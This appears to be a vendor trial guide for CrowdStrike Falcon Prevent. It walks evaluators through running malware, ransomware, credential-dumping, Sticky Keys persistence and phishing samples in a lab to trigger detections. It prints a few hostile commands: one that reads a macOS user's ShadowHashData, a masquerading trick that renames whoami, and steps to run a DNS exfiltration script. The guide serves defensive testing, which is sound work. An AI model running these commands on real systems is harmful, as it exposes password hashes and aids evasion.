Malware and Advanced Attack Testing

Your Falcon trial allows you to test malware samples and advanced attack techniques. This is an optional step for your evaluation, demonstrating how Falcon Prevent protects your environment.

Step-by-step instructions

Estimated Time

20 mins depending on the amount of testing you wish to conduct.

Requirements

Typical device, Mac or Windows OS and Google Chrome browser

Windows
Mac
1. Accessing the cloud-based malware lab 2. Lab Preparation 3. Non-Malicous test 4. Malware 5. Ransomware 6. PowerShell 7. Persistence 8. Phishing Attack 9. Application Management

In this next section you will walk through testing scenarios with actual malware. You should NOT conduct these tests on your laptop or workstation, but rather in a dedicated malware testing environment. To facilitate this, the CloudShare virtual environment ensures that malware testing happens completely outside of your organization. The lab and this guide focus solely on Falcon Prevent which is our anti-virus solution.

1Accessing the cloud-based malware lab

  • If you already have your own malware lab setup, skip this step and proceed with step 2.

Cloudshare is a cloud-based Windows lab environment where you can safely conduct live tests. If you already have a secure malware testing lab, you can also test Falcon Prevent there. The steps in this guide are written to allow testing in our lab or in yours.

  • Together with your confirmation email for the Falcon Prevent Free Trial, you also received an email
    from cloudshare.com
  • Click on the link in the email and follow the signup instructions to leverage our hosted lab environment.
  • Click on the Malware Lab tab to access your test machine.

  • When you access it for the first time, click on the Download Samples icon on the Desktop.
  • A script will retrieve recent malware, ransomware and even script based attacks and put them into the Sample Files folder on your desktop.

This process might take a few minutes to complete. Feel free to minimize the download window and proceed with the sensor download and install from step 2.

2Lab Preparation

  • Download and install the Falcon sensor.
  • As you begin testing, either in your own lab or in the provided virtual environment, sensors for each test host need to be downloaded and installed.
  • For sensor installation, please refer to the Essential steps > Installation.

  • Switch back to the Falcon interface and go to Detections to inspect the new alert.
  • Verify active prevention policy.
  • To test efficacy, the newly installed sensor should have a prevention policy.
  • You can confirm that in the Falcon Interface. Go to Host Management and verify that you see your hostname listed. The Prevention Policy column should show platform_default as the assigned policy.
  • Run the CrowdStrike prevention test file to validate the policy has been applied correctly. Go to Desktop > Sample Files > Non-Malicious and execute cs_maltest.exe. With prevention enabled, you will see a message similar to the one below on the client system.
  • This will also generate a detection event in the Falcon Interface.

3Non-Malicous test

  • Go to Desktop > Sample Files > Non-Malicious and execute cs_maltest.exe.
  • With prevention enabled, you will see a message similar to the one below on the client system.
  • This will also generate a detection event in the Falcon Interface.

Once you have the sensor installed with prevention policies enabled, you are ready to test with live samples. You can choose from the following tests: Malware | Ransomware | PowerShell | Persistence | Phishing Attack | Application Management.

4Malware

  • Once you have the sensor installed with prevention policies enabled, you can begin testing with actual malware.
  • In the malware lab, navigate to Sample Files > Malware from the desktop.
  • We have provided about 25 different malware samples. Use these samples to generate detection events in the Falcon Interface.

  • Run a malware sample from Windows Explorer by double-clicking it.
  • Now navigate back to the Falcon Interface and notice that explorer.exe is the parent process in the process tree.
  • This helps you understand how an attack was executed.

  • Run a sample from a command prompt (cmd.exe). The parent process is now cmd.exe instead of explorer.exe.

  • Use HxD Hex Editor (already installed in the malware lab) to modify the file and change its hash.

  • Then run the modified sample to see that Falcon Prevent can block unknown malware.

5Ransomware

  • In recent years, ransomware has emerged as one of the most prevalent and problematic malware types.
  • We have collected recent samples of prominent ransomware families like Locky and WannaCry and made them available in your lab.
  • To access them, go to Desktop > Sample Files > Ransomware.
  • Feel free to run any of these ransomware files and see how Falcon Prevent provides complete protection against them.

6PowerShell

  • Navigate to Desktop > Sample Files > IOAs-Behavioral.
  • Double-click the Credential_Dumping.bat batch file. This script will run an encoded powershell command to capture credentials.

  • Navigate to the Falcon Interface Detections page and inspect the new detection.
  • Notice that the full command line parameters are available in the execution details pane.
  • In this alert, the process tree immediately shows us that PowerShell was run from a command prompt, that it was identified as Mimikatz, an LSASS process was accessed, and that the command was encoded.
  • On the right in the Execution Details, we can see the full command line argument that was used. No other AV solution provides that level of detail.

CrowdStrike Falcon uses an Indicator of Attack or IOA, to represent a series of actions that an attacker must conduct during a successful attack. IOAs are concerned with the execution of these steps, the intent of the adversary, and the outcomes that adversary is trying to achieve. This allows Falcon Prevent to identify and block new and unknown threats based on the tactics, techniques, and procedures used by the attacker.

7Persistence

  • Navigate to Desktop > Sample Files > IOAs-Behavioral.
  • Double-click the Sticky_Keys.bat batch file. The file will run in a command prompt window.
  • It will secretly modify a registry key that would allow an attacker to login to the machine without ever having to provide a username or password.

  • Now use the “send ctrl+alt+delete” button on the left hand side of your malware lab screen to bring up the windows lock screen.

  • Click on the Ease of Access option in the lower left hand corner and on the screen that pops up.
  • Check the box for Type without the keyboard (On-Screen Keyboard) then hit Apply.

Without Falcon Prevent on this system, a command prompt would have appeared, giving the attacker full system access (NT AUTHORITY\SYSTEM). This is an example of attacker behavior that does not use malware and is commonly missed by legacy AV solutions. Falcon Prevent stopped this persistence mechanism even though no malware was used.

  • Cancel out of the Windows lock screen and switch back to the Falcon Interface.
  • You will find a new, critical alert under Detections.
  • By expanding the new alert, we can see cmd.exe was prevented from launching with system privileges and from bypassing the windows logon process.

In both of these examples, no malware was used. These are examples of file-less attacks. Falcon Prevent identified a behavior that was suspicious and protected the user. This is an example of the power of IOAs. IOAs identify malicious behavior – no matter how it is delivered.

CrowdStrike Falcon uses an Indicator of Attack or IOA, to represent a series of actions that an attacker must conduct during a successful attack. IOAs are concerned with the execution of these steps, the intent of the adversary, and the outcomes that adversary is trying to achieve. This allows Falcon Prevent to identify and block new and unknown threats based on the tactics, techniques, and procedures used by the attacker.

8 Phishing Attack

  • In this scenario we will simulate a phishing attack by opening an email with a malicious attachment.
  • In the malware lab, open Outlook and find our prepared email in the inbox. This phishing attack claims that the user has unpaid charges from a hotel stay.
  • To learn more, open the attachment by double-clicking Folio-0701-2017-00873.xls.

  • After you open the attached Excel file, a Visual Basic error message appears.
  • This indicates that Falcon Prevent has stopped the document from executing its malicious payload in the background.

  • Opening the attachment triggered a new alert in the Falcon Interface.
  • Expanding the new alert clearly illustrates that this threat came from Outlook.exe and that the Excel attachment launched PowerShell.
  • To get even more details as to what PowerShell did, the Execution Details pane shows that PowerShell attempted to run a hidden command and download our malicious script from Github.

9Application Management

Falcon Prevent allows you to manually block or allow applications based on your organization’s unique needs.

  • Navigate to Desktop > Sample Files > Non-Malicious.
  • Double-click and run the Show_a_Hash.exe application.
  • This application does nothing more than show its own file hash in a command prompt.
  • We will use that hash to blacklist the file and prevent it from running again.
  • Copy the hash from the Command Prompt or from here: 4e106c973f28acfc4461caec3179319e
    784afa9cd939e3eda41ee7426e60989f

  • Navigate to the Falcon Interface Prevention Hashes.
  • On the right-hand side, click the upload hashes icon

  • Then paste the hash into the window and select Apply.

  • In the next window, select the action Always Block and select Apply again.

  • Navigate back to the Desktop (close the command prompt window), then double-click Show_a_Hash.exe again and notice that it does not run this time.
  • In the Falcon Interface, navigate to Detections and inspect the new alert.

Managing your hash policy can be done directly from a detection. This means, if a detection is created for a malicious file, it can immediately be added to the blacklist using the “Execution Details” pane on the right of the selected alert. Simply click the “Update Hash Policy” button for the selected hash and make changes. The same is true if a custom application is causing false alerts and needs to be added to the whitelist.

1. Defense Evasion Techniques 2. Credential Theft Detect 3. DNS Exfil Block

These commands will make temporary changes to the machine in order to demonstrate real world examples. However, they do not use live malware. You can also conduct testing scenarios with actual malware in the Windows-based CloudShare virtual environment. The guide for this can be found under the Windows tab.

1Defense Evasion Techniques

This detection illustrates Falcon’s ability to respond to malicious behaviors with IOAs. An Indicator of Attack or IOA, represents a series of actions that an application or adversary must conduct during a successful attack. IOAs are concerned with the execution of these steps, the intent of the adversary and the outcomes that adversary is trying to achieve. This is superior to using Indicators of Compromise (IOCs) or signatures because it allows Falcon Prevent to block new and unknown threats. This specific command makes a copy of whoami with the pdf extension and then executes it. Changing the extension of an existing tool will trigger a Falcon detection for masquerading. The command includes a removal of the file so no additional clean up or reversal is needed.

  • Open a terminal.
  • Type or copy and paste this command:
    cd ~/Desktop; cp /usr/bin/whoami whoami.pdf; ./whoami.pdf; rm whoami.pdf

  • Next, go to the Falcon UI and navigate to Activity > Detections. You should see a new alert, which indicates that the malicious activity was detected.

2Credential Theft Detect

This detection is another example of Falcon’s use of IOA’s. Credential access represents techniques resulting in access to or control over system, domain, or service credentials that are used within an enterprise environment. Adversaries will likely attempt to obtain legitimate credentials from users or administrator accounts (local system administrator or domain users with administrator access) to use within the network. This allows the adversary to assume the identity of the account, with all of that account’s permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.

Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information. The command listed below will query the ‘shadowhash’ for a user via terminal. This command could be used on a MacOS host to gather information used to decrypt passwords. No clean up is needed on the system after executing this command.

  • Open a terminal.
  • Type or copy and paste this command:
    sudo dscl . read /Users/$USER dsAttrTypeNative:ShadowHashData

  • Switch back to the Falcon UI and go to Activity > Detections and see that there is a new Prevention event with the Tactic & Technique Credential Access via Credential Dumping.
  • The green checkmark indicates that this activity was successfully blocked.

3DNS Exfil Block

This detection is another example of Falcon’s use of IOA’s. Data exfiltration (aka “data extrusion”) is the unauthorized transfer of data from a host. The transfer of data can be accomplished manually by someone with physical access or automated, carried out through malware over a network. The contents of this script show transfering (exfiltration) of a fake file over a DNS request covert channel.

  • For the next example, you will need to download a script file that helps illustrate data exfiltration. The script creates ten temporary files, zips them into one package and outputs a hex dump of those files. It removes all of the temporary files so that no additional clean up is required following the test.
  • To download the file go to the following link. Click Download in the top right corner of the window.
  • Set permissions on the script by navigating to the directory where the script is stored and run the following command to set executable permissions. (The example shown specifies the default “Downloads” folder.)
    chmod +x dns-exfil.sh

  • In the same window, run the command below to execute the script.
  • You will see additional activity in the terminal windows as the script runs.
    ./dns-exfil.sh
  • After the script runs successfully, you can close the terminal session.

  • Switch back to the Falcon UI and go to Activity > Detections and see that there is a new Prevention event with the Tactic & Technique Exfiltration via Exfiltration Over Alternative Protocol.

Sample Detections and Testing
Test Additional Modules

NEED HELP?

If you have any questions, reach out and we'll be in touch soon.

TAKE-AWAYS

In the previous sections, we have seen that Falcon Prevent is lightweight and easy to install and manage.

In this section, we saw that Falcon Prevent can protect users from all types of attacks; from the commodity malware attack to more complex phishing. We have even seen Falcon prevent tactics that are typically indicative of targeted attacks that leverage tools like PowerShell.

Being fast, simple, and effective is great, but if the solution doesn’t provide ways to easily handle alerts and triage events you only trade one problem for another.

WAS THIS SECTION HELPFUL?

Your feedback is highly appreciated and will help us to improve our ability to serve you and other users of our web sites. Please send feedback about this section of the trial guide to falcontrial@crowdstrike.com.